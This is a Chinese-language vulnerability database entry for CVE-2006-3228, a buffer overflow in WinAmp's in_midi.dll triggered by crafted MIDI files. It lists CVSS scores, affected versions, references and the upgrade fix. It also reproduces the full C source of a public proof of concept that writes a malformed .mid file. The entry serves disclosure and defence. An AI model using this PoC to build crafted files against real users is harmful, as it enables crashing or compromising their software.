CVE-2006-3228
CVSS9.3
发布时间 :2006-06-26 16:05:00
修订时间 :2011-03-07 21:38:08
NMCOE    

[原文]Buffer overflow in in_midi.dll for WinAmp 2.90 up to 5.23, including 5.21, allows remote attackers to execute arbitrary code via a crafted .mid (MIDI) file.


[CNNVD]WinAmp in_midi.dll 缓冲区溢出漏洞(CNNVD-200606-496)

        WinAmp 2.90到5.23版本(包括5.21版本)的in_midi.dll存在缓冲区溢出,远程攻击者可以借助特制的 .mid (MIDI)文件执行任意代码。

- CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:nullsoft:winamp:5.05Nullsoft Winamp 5.05
cpe:/a:nullsoft:winamp:5.08cNullsoft Winamp 5.08c
cpe:/a:nullsoft:winamp:5.03Nullsoft Winamp 5.03
cpe:/a:nullsoft:winamp:5.09Nullsoft Winamp 5.09
cpe:/a:nullsoft:winamp:5.0Nullsoft Winamp 5.0
cpe:/a:nullsoft:winamp:5.091Nullsoft Winamp 5.091
cpe:/a:nullsoft:winamp:2.95Nullsoft Winamp 2.95
cpe:/a:nullsoft:winamp:5.21Nullsoft Winamp 5.21
cpe:/a:nullsoft:winamp:5.07Nullsoft Winamp 5.07
cpe:/a:nullsoft:winamp:5.08eNullsoft Winamp 5.08e
cpe:/a:nullsoft:winamp:5.23Nullsoft Winamp 5.23
cpe:/a:nullsoft:winamp:5.06Nullsoft Winamp 5.06
cpe:/a:nullsoft:winamp:5.094Nullsoft Winamp 5.094
cpe:/a:nullsoft:winamp:5.1
cpe:/a:nullsoft:winamp:5.12Nullsoft Winamp 5.12
cpe:/a:nullsoft:winamp:5.03a
cpe:/a:nullsoft:winamp:5.0.1
cpe:/a:nullsoft:winamp:5.01Nullsoft Winamp 5.01
cpe:/a:nullsoft:winamp:2.91Nullsoft Winamp 2.91
cpe:/a:nullsoft:winamp:5.02Nullsoft Winamp 5.02
cpe:/a:nullsoft:winamp:5.2Nullsoft Winamp 5.2
cpe:/a:nullsoft:winamp:5.04Nullsoft Winamp 5.04
cpe:/a:nullsoft:winamp:3.1
cpe:/a:nullsoft:winamp:5.08dNullsoft Winamp 5.08d
cpe:/a:nullsoft:winamp:5.11Nullsoft Winamp 5.11
cpe:/a:nullsoft:winamp:5.13Nullsoft Winamp 5.13
cpe:/a:nullsoft:winamp:5.0.2
cpe:/a:nullsoft:winamp:5.093Nullsoft Winamp 5.093
cpe:/a:nullsoft:winamp:3.0
cpe:/a:nullsoft:winamp:2.90

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3228
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3228
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-496
(官方数据源) CNNVD

- 其它链接及资源

http://forums.winamp.com/showthread.php?threadid=248100
(PATCH)  CONFIRM  http://forums.winamp.com/showthread.php?threadid=248100
http://www.winamp.com/about/article.php?aid=10694
(UNKNOWN)  CONFIRM  http://www.winamp.com/about/article.php?aid=10694
http://www.attrition.org/pipermail/vim/2006-June/000893.html
(UNKNOWN)  VIM  20060622 Winamp security vagueness
http://www.attrition.org/pipermail/vim/2006-June/000892.html
(UNKNOWN)  VIM  20060622 Winamp security vagueness
http://secunia.com/advisories/20722
(VENDOR_ADVISORY)  SECUNIA  20722
http://milw0rm.com/exploits/1935
(UNKNOWN)  MILW0RM  1935

- 漏洞信息

WinAmp in_midi.dll 缓冲区溢出漏洞
高危 缓冲区溢出
2006-06-26 00:00:00 2007-06-25 00:00:00
远程  
        WinAmp 2.90到5.23版本(包括5.21版本)的in_midi.dll存在缓冲区溢出,远程攻击者可以借助特制的 .mid (MIDI)文件执行任意代码。

- 公告与补丁

        

- 漏洞信息 (1935)

Winamp <= 5.21 (Midi File Header Handling) Buffer Overflow PoC (EDBID:1935)
windows dos
2006-06-20 Verified
0 BassReFLeX
N/A [点击下载]
/*
 
 * ********************************************** *
 * Winamp 5.21 - Midi Buffer Overflow in_midi.dll *
 * ********************************************** *
 * PoC coded by: BassReFLeX                       *
 * Date: 19 Jun 2006                              *
 * ********************************************** *
 
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

char header[] = "\x4D\x54\x68\x64\x00\x00"
                "\x00\x06\x00\x00\x00\x01"
                "\x00\x60\x4D\x54\x72\x6B"
                "\x00\x00";

char badc0de[] = "\xFF\xFF\xFF\xFF\xFF\xFF"
		 "\xFF\xFF\xFF\xFF\xFF\xFF";
				
				 
				 
int main(int argc,char* argv[])
{
    system("cls");
    printf("\n* ********************************************** *");
    printf("\n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *");
    printf("\n* ********************************************** *");
    printf("\n* PoC coded by: BassReFLeX                       *");
    printf("\n* Date: 19 Jun 2006                              *");
    printf("\n* ********************************************** *");
    
    if ( argc!=2 )
    {
        usage(argv[0]);
    }
    
    FILE *f;
    f = fopen(argv[1],"w");
    if ( !f )
    {
        printf("\nFile couldn't open!");
        exit(1);
    }
    
                        
    printf("\n\nWriting crafted .mid file...");
    fwrite(header,1,sizeof(header),f);
    fwrite(badc0de,1,sizeof(badc0de),f);
    printf("\nFile created successfully!");
    printf("\nFile: %s",argv[1]);
    return 0;
}        

void usage(char* file)
{
    printf("\n\n");
    printf("\n%s <Filename>",file);
    printf("\n\nFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid");
    exit(1);
}    

// milw0rm.com [2006-06-20]
		

- 漏洞信息

26727
Winamp in_midi.dll MIDI File Processing Overflow
Local / Remote Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-06-20 Unknow
2006-06-20 Unknow

- 解决方案

Upgrade to version 5.24 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站